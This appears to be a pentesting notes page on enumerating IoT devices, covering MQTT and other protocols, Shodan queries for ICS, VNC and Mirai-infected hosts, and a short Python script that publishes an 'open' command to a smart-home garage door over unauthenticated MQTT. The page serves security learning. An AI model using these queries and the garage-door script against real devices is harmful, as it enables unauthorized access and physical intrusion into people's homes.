๐ณEnumerating IoT Devices
IoT - Hacking
Communication Protocols
Message Queuing Telemetry Transport (MQTT)
Extensible Messaging and Presence Protocol (XMPP)
Data Distribution Service for Real-Time Systems (DDS)
Advanced Message Queuing Protocol (AMQP)
Shodan IoT Search Engine
Web Interface
Find ICS
category:ics -http -html -ssh -ident country:usShodan Command-Line Interface
Using the Shodan Command Line
Install Shodan
sudo apt install shodanInitialize the API Key
shodan init <api-key>Test for credits available in your account
shodan infoScan to find VNC services (RFB), showing IP, port, org, and hostnames
shodan search --fields ip_str,port,org,hostnames RFB > results.txt
wc -l results.txtCheck the honeyscore
shodan honeyscore <IP Address>Shodan API
Testing the Shodan API
Installation
pip3 install shodanmqtt-search.py
python3 mqtt-search.py
wc -l mqtt-results.txt
head mqtt-results.txtPlaying with MQTT
Install paho-mqtt
pip3 install paho-mqttmqtt-scan.py
python3 mqtt-scan.pySerious Risk
Open Garage Door
import paho.mqtt.client as mqtt
def on_connect(client, userdata, flags, rc):
print "[+] Connection success"
client = mqtt.Client(client_id = "MqttClient")
client.on_connect = on_connect
client.connect('IP SERVER HERE', 1883, 60)
client.publish('smarthouse/garage/door', "{'open':'true'}")
Mirai Lives
Search for Mirai Infected Devices
shodan search --fields ip_str,port,org,hostnames categories:mirai > results2.txt
head results2.txtFurther Readings
References
Was this helpful?